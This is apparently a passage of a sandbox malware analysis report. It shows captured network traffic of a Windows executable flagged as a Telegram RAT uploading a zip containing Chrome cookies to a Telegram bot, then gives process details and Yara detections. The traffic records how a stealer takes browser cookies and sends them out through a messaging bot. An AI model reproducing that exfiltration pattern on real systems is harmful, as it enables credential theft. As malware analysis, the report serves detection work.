                                                                                                                                                              2023-09-01 11:40:10 UTC401OUTData Raw: 92 02 b7 3b 78 97 b1 85 7f 68 52 a1 e6 36 b5 22 aa 30 58 ed bf 3c e7 24 0a 14 21 44 2e 22 49 71 af ef 7b c5 4e 10 1d 48 be 91 29 1c 60 18 12 38 56 da 00 78 bd 51 e5 99 2f 2e 37 a6 f9 1a ba 1e b7 53 7e ab 25 05 61 5a e8 48 11 23 94 f3 62 40 89 f1 0d 03 40 11 9f 83 37 a0 bb 5e cc 80 c6 e6 27 10 c6 68 4b 1f c9 76 ff 5a 01 aa c0 40 1f c0 b1 20 c7 23 77 db 1b 54 2b b1 ca 51 55 f2 ac fe 64 74 54 29 c3 bd 62 bc 7b 57 e3 eb 17 70 dd f8 ac 3a 0d 46 29 40 5c 8b 60 f7 6f e5 fa e9 17 31 c0 c5 a8 89 40 9b 0e 10 04 79 df 47 fd 1b 13 4e 9e c8 27 94 35 a4 9a cd 5c 3c 7b 41 22 b8 84 d8 7d b1 ec d9 83 90 dd 9b 25 0c 97 54 52 ba 53 80 b8 c5 f7 d8 fc 13 d8 fc 73 c8 6d d9 6d b2 6f 93 81 f0 c7 f9 05 81 b4 a9 8a f7 f9 6f d7 c2 23 fb 42 a5 cc f3 7e 95 e7 16 05 b4 1f 0c 49 3c 0c
                                                                                                                                                              Data Ascii: ;xhR6"0X<$!D."Iq{NH)`8VxQ/.7S~%aZH#b@@7^'hKvZ@ #wT+QUdtT)b{Wp:F)@\`o1@yGN'5\<{A"}%TRSsmmoo#B~I<
                                                                                                                                                              2023-09-01 11:40:10 UTC417OUTData Raw: 20 0b 8a 19 04 0b 82 32 8a 76 2d 69 6e 07 ab 32 82 d5 dc e2 a1 12 8a d4 d7 b3 bc 40 e1 a4 10 3e 26 98 21 ef 86 55 87 0a 79 a9 7d 0a a9 8f b8 18 cd b8 49 05 65 0c 1a fd d3 73 b9 5e d0 c5 9b 35 a3 46 00 76 2c 00 f8 ea 27 11 63 0f 7e 56 dd b3 5e ad 01 37 f4 8d fe f7 13 41 d4 b2 e1 89 ed 3f 23 19 3b 61 41 de 90 e2 b9 bd 8e 6d 8e 6c 37 e2 ba 48 5e b7 98 11 c9 a1 4b 0b 59 1e 1c 8d fd ef 03 6b ff e8 1f ec 68 bd 3a 51 bf d2 e3 a9 a2 0c d0 98 4c 10 67 ee ed 28 c9 c7 04 31 00 be 1b 22 e1 64 17 1d 4c 84 9e 72 22 60 fd 56 c3 fa 6d ec 21 90 c0 5f 62 f4 1c e2 c8 ac 9c 6f 76 d1 da 14 4f 66 31 e4 fc ea 10 0f 4b f8 65 ce ed 13 21 cb af a6 56 54 20 04 98 7e 70 bd 41 7e e8 ff e7 a4 1c 8a e3 68 0c d1 1d 75 3f 5f e1 37 7c a9 a3 b0 f2 30 74 41 7e 65 94 f5 18 fb 88 65 5f 85 c5
                                                                                                                                                              Data Ascii: 2v-in2@>&!Uy}Ies^5Fv,'c~V^7A?#;aAml7H^KYkh:QLg(1"dLr"`Vm!_bovOf1Ke!VT ~pA~hu?_7|0tA~ee_
                                                                                                                                                              2023-09-01 11:40:10 UTC433OUTData Raw: 91 27 c2 b7 a3 f3 e4 4d ea 02 62 ae dc 3b a7 3c be 5a eb bf c7 17 4e fc 77 d9 ce fb 82 ec af 18 91 27 1f 91 7f a8 90 fb c6 c8 3e f1 86 5a 02 76 9a d5 70 ab ec 42 37 f1 3e 9c 28 ef f9 06 78 5e 21 06 ae c9 6c 78 da 7c 71 9f 37 a2 dd 13 51 e9 69 bf c6 88 44 c1 36 2f da 73 b4 0c 96 19 ca 1b b4 38 9b 35 f8 1b 56 cc 21 54 f9 ab 62 12 c5 8f 7f 91 6d c4 87 07 91 55 d5 74 1d a5 e4 05 d9 46 d3 dc 75 35 9c 29 4d 59 4c cf 47 88 a3 c9 9d 01 da 23 53 ba 0c 03 24 61 36 33 46 34 e2 79 24 2b cb bb 24 96 34 20 c3 18 df d0 c8 32 15 0f b0 9d 7b 61 a2 14 79 ca 0d aa 75 2d 6e 0c b1 7d 48 f9 d1 36 23 f8 65 5d 45 5b f4 52 aa 4d b0 b8 54 79 26 f1 6c 9c e0 40 46 ea 5b b6 2f 34 e2 cf 99 f2 20 21 11 de c6 71 7a 70 fd 71 71 2e f7 9d 2a ae 97 0e be 7f 03 1e 40 ab cd 8e 9e a1 f7 71 c7
                                                                                                                                                              Data Ascii: 'Mb;<ZNw'>ZvpB7>(x^!lx|q7QiD6/s85V!TbmUtFu5)MYLG#S$a63F4y$+$4 2{ayu-n}H6#e]E[RMTy&l@F[/4 !qzpqq.*@q
                                                                                                                                                              2023-09-01 11:40:10 UTC449OUTData Raw: 6d 53 0c dd 6e 12 b5 40 df 39 4d ba 6b 3a 3c 15 fc d7 45 bd 97 5b 43 df 9b 69 a3 5f 33 12 93 e0 18 90 7a 1f f6 3c 73 ee cd 36 c2 7e 1f 12 86 cf c8 bd 0f e5 69 e8 9b 0f a2 d4 5f e9 a1 c5 26 63 67 a2 df 55 1a fd ae d6 a6 7c 57 13 06 2b e8 77 25 d0 57 6f 7b 26 11 fa 6a 00 bc 49 b4 31 73 fa d5 01 98 3c 9f c5 fe 3f f2 71 df 3f ac e3 82 e7 5c a5 f2 14 25 01 c0 4f 95 1a e5 5f a0 5f 10 d0 2f 02 f0 4e 49 c3 5d 02 60 e5 c5 77 51 7f 79 4f 17 a7 df f7 94 bf fe db 9c eb 7b 14 f4 d5 e8 17 88 17 a1 37 9c cd 15 47 df 2f a5 7f 86 69 7b 96 5e 2b 47 59 22 8e f6 eb f4 ab 8c 3d a8 50 b7 33 a2 6f 05 4a a3 5f 79 5c a5 ad ea 6b e6 de 90 da 2f 57 5c 98 41 5f a3 e7 59 e7 de c4 3a 39 a9 5e e6 85 5f 33 f4 9a 89 57 b6 b2 ae 4e bc 04 bd 54 49 d0 bb e6 cc 7e ce 86 a9 15 fa 5a 75 49 e9
                                                                                                                                                              Data Ascii: mSn@9Mk:<E[Ci_3z<s6~i_&cgU|W+w%Wo{&jI1s<?q?\%O__/NI]`wQyO{7G/i{^+GY"=P3oJ_y\k/W\A_Y:9^_3WNTI~ZuI
                                                                                                                                                              2023-09-01 11:40:10 UTC465OUTData Raw: c9 78 02 6b e7 c8 d6 fa a1 9a fa a9 96 76 37 78 ed ef a1 39 b0 d8 ed 69 7f ad 4e 63 4e 8d 51 14 5b b9 09 4c 5f d3 47 43 56 66 fa fd 8b fc 20 a9 36 02 14 d2 c3 9e f4 63 4e 5c 84 e7 e4 18 bc 6a fb 90 5a 13 43 94 a1 dd 77 b2 a4 c1 57 9b 6b 6a a2 2e 80 eb c8 15 c9 f8 25 0e 99 d5 4c 74 8c 46 bf 87 ac 0c 61 90 19 d6 be 74 68 48 e1 c4 56 b8 77 04 b4 6a 6f 3f 02 43 92 93 99 d8 c8 89 53 ec 16 0d 83 c4 6c 1a de 75 89 b3 21 6c 23 3c f5 21 36 83 34 e9 48 64 ba 91 71 46 f2 24 c4 1a 68 84 af 54 e3 8e 72 ba b6 e7 cc c6 f3 55 b5 e1 84 81 d2 64 a9 ff 19 c2 4f 7f b7 2c ce ab 06 d8 d5 bb bd 5b 11 c4 35 b5 94 f2 cd d8 06 33 d6 7f da de 7d 70 9e 8f 93 c3 0e d6 c9 60 95 4b 04 a0 cc 9a fc 24 71 c7 7f 1f 8b 90 c3 da f3 21 78 74 8b f9 66 70 d7 ae f7 90 f4 18 50 ca 65 c9 f5 d8 4b
                                                                                                                                                              Data Ascii: xkv7x9iNcNQ[L_GCVf 6cN\jZCwWkj.%LtFathHVwjo?CSlu!l#<!64HdqF$hTrUdO,[53}p`K$q!xtfpPeK
                                                                                                                                                              2023-09-01 11:40:10 UTC481OUTData Raw: cd 6c e0 39 dd 17 9e 41 4f 63 cd 12 8b 9b c6 90 2d cc 09 8b 4c a7 c0 8e a5 a8 4c 4f 64 b6 1a 99 a5 45 e4 a8 e1 99 f4 c9 78 fb 9c c7 22 b0 b7 ef 39 ea c0 14 fe 46 83 b1 3a 4e 8d 3a 07 1d da 91 b0 7f 8e 3d 7f 78 f2 68 c2 54 89 7d 11 e7 bc 51 67 95 7e 27 d5 f0 13 a0 c1 11 c7 29 4a f8 11 35 e2 28 95 61 4f dc 71 25 f6 18 89 3e 02 23 c7 91 87 e0 a4 d7 31 47 d5 b8 e3 de 41 27 2a 0e 3b 7f 77 62 f6 83 93 2e 3f 31 fb da af 16 e9 cf af d0 9f 5b a3 3f bb 56 7f 66 8d fe c4 6a fd f1 e5 fa 43 4b af 3e b8 e8 4a 95 85 57 ab 2e d1 ef 9f af df 3b f7 ca dd b3 af dc 33 e7 ea 3d b3 75 ca 5d 33 af de 3b fb ea dd 33 cb ee 9c 5e 72 fb f4 e2 3b a6 15 d3 f3 f6 a9 45 b7 4d 2d 0c 9d 90 1f 32 3e cf 37 2e d7 3b f6 82 27 25 87 a2 25 67 6b 49 17 d4 c4 3c 0a 89 cf 23 a3 73 a1 9b 1a c8 03
                                                                                                                                                              Data Ascii: l9AOc-LLOdEx"9F:N:=xhT}Qg~')J5(aOq%>#1GA'*;wb.?1[?VfjCK>JW.;3=u]3;3^r;EM-2>7.;'%%gkI<#s
                                                                                                                                                              2023-09-01 11:40:10 UTC497OUTData Raw: 88 e0 fe b4 87 fc 29 3b 5d 9f f6 08 f9 ec 6b b5 68 ce 60 f5 a5 50 01 96 b5 3d cc d6 3a b0 a4 87 72 07 21 c0 e0 c0 5a 5c 56 59 1e 94 45 1c b8 cc 20 8c e0 c0 9a fd 52 01 2e a3 0b 30 0b 8e 26 68 75 e0 c1 26 24 03 43 1f b8 00 53 07 7e a4 02 2c 6a b0 d6 0b cd da a1 59 29 78 01 13 ce e6 94 25 66 87 34 14 5a b5 d4 f1 66 cb 03 54 62 4d ea 2b 35 5e 04 eb 88 4d 4d fb 7c e8 dd 89 9c db fe 0d 88 6a 1d cc 99 6b ee a9 28 cd eb d2 7a d9 59 bb 26 6d d8 22 e6 f6 69 43 f2 b6 35 7f db 54 1c d6 16 4d 39 08 b0 ae bb 56 4c 02 8c dd 18 3b b0 da 29 86 b0 05 9f b4 68 6c 64 0b 29 20 1b 37 18 9b 68 b7 99 d1 9e c6 56 1b 7d 98 56 8c 89 fd f2 7a 32 f4 42 3f 04 01 96 2d 11 5c 26 a4 ee 87 68 20 16 9d 04 16 db a1 8d d5 e0 53 d2 d7 fa 48 b0 49 80 35 0c ba 6b bb 2a c9 d6 87 4d 0e 1c 60 31
                                                                                                                                                              Data Ascii: );]kh`P=:r!Z\VYE R.0&hu&$CS~,jY)x%f4ZfTbM+5^MM|jk(zY&m"iC5TM9VL;)hld) 7hV}Vz2B?-\&h SHI5k*M`1
                                                                                                                                                              2023-09-01 11:40:10 UTC513OUTData Raw: 77 a2 41 cf 5f 3e e9 e5 4b f3 eb eb 2f fb 37 3c 8e 48 af fc 4e cd c8 20 6f 91 a2 c1 b0 c4 91 f6 14 f2 cc fc b6 05 47 b2 db 2f 0e ad ea 8e 5d 10 c7 ae f7 8e 62 5a 8e 12 5a 8e 54 44 c8 15 06 be 44 06 fe 6f 0c 7c da 8c f0 a7 bc ba 0c fc ff ed 09 b4 85 02 8f 76 7f fe 20 d9 5c 69 b5 ba a6 bb 93 49 21 39 41 57 9f 45 ba 50 e4 36 f8 72 b9 84 fd e0 08 e2 94 fe 4e e2 be 58 b5 cb 55 44 82 7d 46 8c f0 7b 30 c7 45 2f 82 34 2a db 43 ef d6 3a f4 61 bb 82 82 21 6f e8 aa 5f 2d 06 8d 63 48 39 81 4f 3c 2c 40 43 c9 a9 5c d1 fe e1 47 d2 c4 88 a4 e6 97 5f 88 04 b7 e2 ea 1e 6c 40 bc ae 97 de ee dc c2 6d 77 a7 3d d0 ae b6 c5 10 66 f7 f7 cc c6 f7 de 60 28 7f 5b d3 d7 8b c1 bb 19 cc b3 17 35 58 39 6b 63 3d bd 5f 5f 9e a4 e4 ad da 81 6c d5 48 13 5f f3 ad 31 e7 c3 6f 0e 19 7c 6c ce
                                                                                                                                                              Data Ascii: wA_>K/7<HN oG/]bZZTDDo|v \iI!9AWEP6rNXUD}F{0E/4*C:a!o_-cH9O<,@C\G_l@mw=f`([5X9kc=__lH_1o|l
                                                                                                                                                              2023-09-01 11:40:10 UTC529OUTData Raw: f1 71 f8 b0 11 52 2c 2d 6c 52 07 13 11 e0 b1 ae f1 d8 b2 95 da a4 03 94 e5 3b 97 24 82 d9 34 a5 69 80 a0 3f 79 35 2a 22 d3 d8 6e d4 97 fd 7c d3 5e 3f 86 7f 6c 8d d8 56 df a4 d2 f3 30 1a 20 1d f8 07 9d 56 92 49 b0 36 32 f9 cc 73 5f 84 10 5a 92 61 01 37 9f 4e 16 23 06 07 4a 82 08 e5 d8 e0 20 67 d8 09 1d 3e f6 13 03 b0 01 bf 36 96 fe 42 50 63 ab 2e 17 ed 12 2a 22 a8 46 30 1b dd 71 f8 fe 5d 90 af 60 75 ec 57 04 fa 3c 89 09 a4 e8 cc 5f 5b 73 52 00 46 c4 50 87 ca 10 d6 47 6c 22 ca c0 49 ba a6 94 1a 1c d1 04 91 02 24 05 6c ce ad d3 10 48 08 c2 ce 21 b3 fc 04 cf 4f 67 53 88 b1 aa da f9 9d c2 67 9a e7 d4 34 10 8c 7a a7 4b c9 7e 72 82 5a bb bb b5 05 4a 86 71 fb e1 b0 eb da ae e4 79 60 47 96 f3 87 7d e2 87 fd 8b 36 72 2c 4a ee 52 de de 76 27 7a b9 49 07 7d 1d 4f 87
                                                                                                                                                              Data Ascii: qR,-lR;$4i?y5*"n|^?lV0 VI62s_Za7N#J g>6BPc.*"F0q]`uW<_[sRFPGl"I$lH!OgSg4zK~rZJqy`G}6r,JRv'zI}O
                                                                                                                                                              2023-09-01 11:40:10 UTC545OUTData Raw: 37 27 f1 bd a8 31 e7 dc 28 37 09 46 9c 33 d3 fc 10 39 79 26 24 ae 9b 6b d9 ba af ea 21 23 79 77 44 d0 29 e0 93 05 9f 41 ae 07 85 b8 8e 6d 8c da bf 44 77 9a 34 9d 3f ec 7d ba f4 06 ef 57 57 42 11 4a ff 95 c6 68 9e e0 03 64 f2 03 53 d1 f5 94 8e e9 d3 0e dd 21 d5 9f e9 1f 35 06 5f 2a ea 87 f3 6e 5d 20 1e ba 90 cc df f4 a5 22 1a dc 2b 4c 94 ad dc 39 bb ae 30 ef 71 7a 01 0d 08 1b 11 f1 ca bd 1e f0 27 a9 3c 6b 7e 3a 59 3f 83 71 3f ac 48 30 c7 45 2a 50 9a fc b4 57 df 74 ed 6f 53 8d f0 22 8f dd 1e 1f 57 60 de f7 64 27 1f 56 9e 69 cb d7 25 d4 2a 1a 5f e8 15 fd 5f be 93 d0 fa 45 a6 1b e0 fa d7 59 7c 2f 21 f0 e0 eb c7 23 b9 aa a6 f9 5f a9 92 df 07 bf ce f6 0e 09 ce 77 f8 92 b3 a8 e7 cf 6f 8d 43 37 3d e5 bd 85 81 37 29 75 c9 12 14 5d bb e9 ae 0a 41 73 55 3f 90 38 65
                                                                                                                                                              Data Ascii: 7'1(7F39y&$k!#ywD)AmDw4?}WWBJhdS!5_*n] "+L90qz'<k~:Y?q?H0E*PWtoS"W`d'Vi%*__EY|/!#_woC7=7)u]AsU?8e
                                                                                                                                                              2023-09-01 11:40:10 UTC561OUTData Raw: 73 0f 1f a7 28 7c 84 f7 2e e6 2b 5b 53 43 84 08 5a e9 bc 8c 18 e3 ec 35 ba 29 0e e2 69 c2 88 a1 14 16 79 f1 1e e9 00 fb 08 56 4e 88 39 d6 af f4 e9 ee 12 a5 7f f2 4c f2 28 16 08 8c d1 27 a1 48 c5 05 33 e3 1a 8b 45 0f f9 34 e9 f3 d6 5e ef a7 ba 4a b3 b9 6c 57 a3 4c 66 e6 c8 cd b5 19 10 ca 8e 02 c0 72 b9 1f bc 84 33 57 40 97 1f 93 63 b8 97 3b 41 aa 19 f9 b5 53 5c c9 12 00 59 1e d9 e5 d0 e5 ec 57 ed 4a b0 c2 8f 5d 55 3a 9c 43 db 9c fd 6d 3a 3f 32 e3 72 2e 72 f0 cd fd b3 f4 07 87 ce bb 96 3d 5f 9c ba dd 5e 2b c1 cf ce 75 79 92 cc da bb 73 e3 7c 09 f6 5c 33 d9 be dd 50 55 c5 e6 50 4c fb 35 57 a7 c9 80 b1 b6 61 c8 c4 c1 b4 3a bc 5c fc d4 ba 5b 6c e8 d4 6d 5c 33 b2 bd 94 36 3c 77 8f d3 b3 c7 2f 24 92 c6 ff 80 d0 2d 85 db dc b6 01 78 7e c4 1b 8f 2a 9d 74 9e 32 7a
                                                                                                                                                              Data Ascii: s(|.+[SCZ5)iyVN9L('H3E4^JlWLfr3W@c;AS\YWJ]U:Cm:?2r.r=_^+uys|\3PUPL5Wa:\[lm\36<w/$-x~*t2z
                                                                                                                                                              2023-09-01 11:40:10 UTC577OUTData Raw: ba a5 be de 7e fe 8c 5b 85 4b a1 d6 f5 ac 74 fe 5a 51 10 62 a6 a0 d9 c1 ad e2 ae 67 53 6c 51 a9 31 7d d9 01 52 f0 30 91 1c 16 24 14 7e ec 9e f9 77 fd 53 09 fe e9 04 9b 5c c4 1f db 7a 9f 30 29 bd c3 96 8f eb ea 82 80 18 9a f7 3a 38 1d 9a da a7 09 01 4b dc ad fc 7e a8 e4 91 88 d2 a4 f6 ce 7a eb 6a e0 31 61 5a 03 4d 27 dd 1d ca 32 20 25 5b 15 db 63 b5 83 26 e6 0d ab 3e 44 ea 51 f3 c9 cd fc d8 d6 80 8e c5 4e 73 e8 c4 f6 d6 45 f8 8d 3b 39 7b 0e fe 13 e2 45 1a 00 72 16 24 b1 cb e8 74 f4 90 5f 57 06 0c a2 6b f9 78 b3 58 73 19 bc e6 66 38 e5 b8 3c 2b a7 53 04 1c c2 15 72 a0 8c ee 53 37 6e 94 1e eb 53 9a a0 7d 31 c1 30 60 e5 14 fc 97 82 46 0f 8b b4 e0 8e e8 3e 7e 87 a9 5a 48 51 58 9b b6 96 f6 5f bf b1 bd 7e 45 74 95 15 bf ec cc d9 fe 11 f3 ee ea 3b cd d6 42 bf ef
                                                                                                                                                              Data Ascii: ~[KtZQbgSlQ1}R0$~wS\z0):8K~zj1aZM'2 %[c&>DQNsE;9{Er$t_WkxXsf8<+SrS7nS}10`F>~ZHQX_~Et;B
                                                                                                                                                              2023-09-01 11:40:10 UTC593OUTData Raw: 9b e4 1f 5b 42 8c 8e eb 3b 76 14 c1 9a 12 55 00 d6 82 c0 5f aa 4d 56 94 d0 6f a8 0c 9e a8 50 36 62 9b 50 ef 9a b5 ce 8d cd 3d 90 f7 23 c0 04 af 10 e5 c0 12 53 a4 c7 1d 40 1b 7f 76 0c 3d 67 a0 3f 90 7a d5 f8 fe 35 62 c6 ea d1 c1 f2 b5 47 31 0f 61 52 ec bf 4e a2 53 c8 f8 72 ee 08 dd 7e 30 75 fc 8e 59 56 4a 2e c0 3f 4b 45 21 f2 d6 f2 81 e9 a5 63 1d 6d 22 08 70 a3 e5 57 f9 96 a9 8a ad 66 8f eb 34 fa ff 8b 6c 6c dd ab f4 f7 e3 0e 7b ac 93 7f d9 a1 09 ec e4 2c db c7 23 4b 42 e1 a5 5f 79 7e b4 4e 11 d4 15 06 94 de 04 98 32 f1 69 5a e8 5c 89 e5 1a b6 57 b5 f6 ba b7 e9 b8 c4 bf 24 f4 ef 1e 82 03 26 c8 7a 88 4c 10 d3 7a b7 58 08 f5 3c e7 b1 11 a0 a0 87 7e 7c 63 1f f0 4e 8e 83 8d ac a6 c6 72 53 42 4b 54 12 72 d7 1a f1 0f 5b ef cf 10 d1 22 fd 35 e9 0e 55 ae 2d ca cb
                                                                                                                                                              Data Ascii: [B;vU_MVoP6bP=#S@v=g?z5bG1aRNSr~0uYVJ.?KE!cm"pWf4ll{,#KB_y~N2iZ\W$&zLzX<~|cNrSBKTr["5U-
                                                                                                                                                              2023-09-01 11:40:10 UTC609OUTData Raw: 9b da 3b 60 d9 12 8e f2 03 a3 05 3c f2 fc 67 44 bc 39 88 2d be b4 7a a1 9e af f6 9e b9 03 13 81 09 bf 0e c0 01 1d 1c 67 e5 fe a3 58 fd f8 79 90 96 87 a9 5e 99 65 6e 8f b9 9b 41 ac a4 7e 0a 30 5b 2b f1 2a e4 d6 56 ec 21 81 c6 54 1b f3 48 41 9f 8d 1d 5a 8c fa a1 94 0e 15 93 c0 3d f1 33 b2 51 31 bb 21 94 ce e6 1b 8c 0b 82 b0 ba d1 47 24 f1 c5 62 fa e7 91 af 38 2b 5b 2c ef 27 39 01 1f d7 44 89 19 11 54 64 a7 3d a0 ac d4 91 62 e2 b5 69 17 35 7b 03 d8 3c ec c9 5f 85 96 5e 21 fb ae 9e 61 53 a8 93 72 f5 b9 0b 0c e8 25 8a 5b 34 8f 65 a7 16 ab 8c 35 fe ba 76 35 4d 4b 0f 33 37 52 24 ba 44 cd 90 6a fe 37 29 b2 94 b6 fe 8a c8 1e ff 76 43 b7 8c fa 96 bc 82 01 66 41 4e 0f 06 0e 44 50 c1 60 ca 55 33 8d 08 c7 fb 91 1b 06 18 bf 23 2f 77 bf 15 83 ee 00 8f 3a 20 4d ff 9e 4c
                                                                                                                                                              Data Ascii: ;`<gD9-zgXy^enA~0[+*V!THAZ=3Q1!G$b8+[,'9DTd=bi5{<_^!aSr%[4e5v5MK37R$Dj7)vCfANDP`U3#/w: ML
                                                                                                                                                              2023-09-01 11:40:10 UTC625OUTData Raw: 5d 65 21 3e 26 e6 0f 41 8d 96 db be 0e da ea 58 83 e5 8d 39 36 ab 96 df a7 c5 88 99 17 17 2c 31 61 d4 ba 96 0a 35 d7 3f 32 ed 40 12 af a8 0e 03 24 27 07 a6 60 85 66 5b c6 f6 27 85 10 44 16 05 18 2b 78 97 69 27 fe 43 ef 6e af 2b 13 28 46 e7 3e 52 ad 6c 74 cf 0e 4b c0 7f b7 05 55 cd 3b 61 f7 a7 8b e1 0f e9 02 a0 da 14 c8 3c a8 74 ad b1 a8 65 bb 5c 1b e0 6b 77 d6 fe 79 13 bb 5e 1b fb df 4e 97 dd 53 2e c5 eb 3d 35 e7 eb 2a be fe 64 67 88 ea 13 88 96 e4 18 7a d9 7d 03 0b 1b d0 4f 70 cf 3c ae bc b2 b0 f4 96 99 ef 32 79 3e 84 d9 8f 5f 23 28 94 80 24 ca a9 f2 6c 57 bd 66 9b 68 91 bc 4f 2f 7f 8a d8 71 8b 72 a1 e5 18 e1 bb 7a 5c 46 af f4 bd 82 8b bb d9 e5 f8 b2 46 af b4 88 4e cf 0e e7 da 52 3f 9f d9 6e cc b8 49 74 f9 3a 1c e8 20 40 03 78 83 b3 e1 88 f2 62 d8 ce fe
                                                                                                                                                              Data Ascii: ]e!>&AX96,1a5?2@$'`f['D+xi'Cn+(F>RltKU;a<te\kwy^NS.=5*dgz}Op<2y>_#($lWfhO/qrz\FFNR?nIt: @xb
                                                                                                                                                              2023-09-01 11:40:10 UTC641OUTData Raw: 10 00 ff 41 27 00 00 00 50 72 6f 67 72 61 6d 73 2f 50 4b 01 02 14 00 14 00 00 00 00 00 02 6d 21 57 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 00 00 00 00 00 00 10 00 ff 41 4e 00 00 00 53 79 73 74 65 6d 2f 50 4b 01 02 14 00 14 00 00 00 00 00 01 6d 21 57 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 10 00 ff 41 73 00 00 00 42 72 6f 77 73 65 72 73 2f 43 68 72 6f 6d 65 2f 50 4b 01 02 14 00 14 00 00 00 08 00 01 6d 21 57 a4 ab e0 06 15 03 00 00 e4 05 00 00 23 00 00 00 00 00 00 00 00 00 00 00 b6 81 a1 00 00 00 42 72 6f 77 73 65 72 73 2f 43 68 72 6f 6d 65 2f 44 65 66 61 75 6c 74 20 43 6f 6f 6b 69 65 73 2e 74 78 74 50 4b 01 02 14 00 14 00 00 00 08 00 01 6d 21 57 13 3d e2 b2 20 00 00 00 21 00 00 00 26 00 00 00 00 00 00 00 00 00 00 00 b6 81
                                                                                                                                                              Data Ascii: A'Programs/PKm!WANSystem/PKm!WAsBrowsers/Chrome/PKm!W#Browsers/Chrome/Default Cookies.txtPKm!W= !&
                                                                                                                                                              2023-09-01 11:40:11 UTC641INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                              Date: Fri, 01 Sep 2023 11:40:10 GMT
                                                                                                                                                              Content-Type: application/json
                                                                                                                                                              Content-Length: 445
                                                                                                                                                              Connection: close
                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                              2023-09-01 11:40:11 UTC642INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 34 38 34 35 39 33 36 34 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 41 50 49 20 74 6f 6b 65 6e 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 75 72 73 74 62 72 61 69 6e 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 37 38 30 34 34 30 30 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 72 61 69 6e 69 61 63 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 61 6e 6e 6f 6e 62 61 6c 6c 30 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 39 33 35 36 38 34 31 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":14,"from":{"id":6484593640,"is_bot":true,"first_name":"API token","username":"Burstbrain_bot"},"chat":{"id":278044001,"first_name":"Brainiac","username":"cannonball0","type":"private"},"date":1693568410,"document":{"file_


                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Target ID:0
                                                                                                                                                              Start time:13:39:57
                                                                                                                                                              Start date:01/09/2023
                                                                                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:9'189'187 bytes
                                                                                                                                                              MD5 hash:42BA63DEB6C8BFDD80B696E533EE9F2A
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:1
                                                                                                                                                              Start time:13:39:59
                                                                                                                                                              Start date:01/09/2023
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:9'737'728 bytes
                                                                                                                                                              MD5 hash:BA25C8AF9DD114244EC83C9F6B0D12EB
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000000.207348284.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe, Author: Joe Security
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:2
                                                                                                                                                              Start time:13:40:00
                                                                                                                                                              Start date:01/09/2023
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=552
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:9'737'728 bytes
                                                                                                                                                              MD5 hash:BA25C8AF9DD114244EC83C9F6B0D12EB
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000000.209057269.00000000005FE000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
